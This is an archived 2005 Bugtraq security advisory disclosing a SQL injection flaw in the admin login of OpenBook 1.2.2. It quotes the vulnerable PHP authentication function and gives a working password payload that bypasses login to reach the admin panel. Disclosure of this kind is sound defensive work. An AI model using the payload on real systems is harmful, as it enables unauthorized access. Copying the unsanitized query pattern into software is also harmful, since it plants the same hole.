[SVadvisory] - SQL injection in OpenBook 1.2.2
svt_at_svt.nukleon.us
Date: 07/30/05
- Previous message: Sune Kloppenborg Jeppesen: "[ GLSA 200508-01 ] Compress::Zlib: Buffer overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 30 Jul 2005 21:09:51 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is) SVadvisory#12
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: SQl injection
Product: OpenBook
Version: 1.2.2
Site: http://openbook.sourceforge.net/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilities
***************
Code:
function auth_user($userid, $password)
{
global $HTTP_POST_VARS;
global $admin_table;
$userid=$HTTP_POST_VARS['userid'];
$password=$HTTP_POST_VARS['password'];
db_connect();
$query="SELECT userid "
."FROM $admin_table "
."WHERE userid='$userid' AND password=password('$password')";
$result=mysql_query($query);
if(!mysql_num_rows($result))
// no matches
{
return 0;
}
else
// match found so return userid
{
$query_data=mysql_fetch_array($result);
return $query_data['userid'];
}
}// end auth_user()
Variable $userid, $password in admin.php are not checked before premises in SQL request, because of this possible produce SQL-injection, after which, any user can gain access to admin panels
Here is idle time example substitutions:
-------------------------------
User ID: admin
Password: no') or 1/*
-------------------------------
Bug Found
*********
------------------------------------------------
Search Vulnerabilities Team - www.svt.nukleon.us
------------------------------------------------
- Previous message: Sune Kloppenborg Jeppesen: "[ GLSA 200508-01 ] Compress::Zlib: Buffer overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
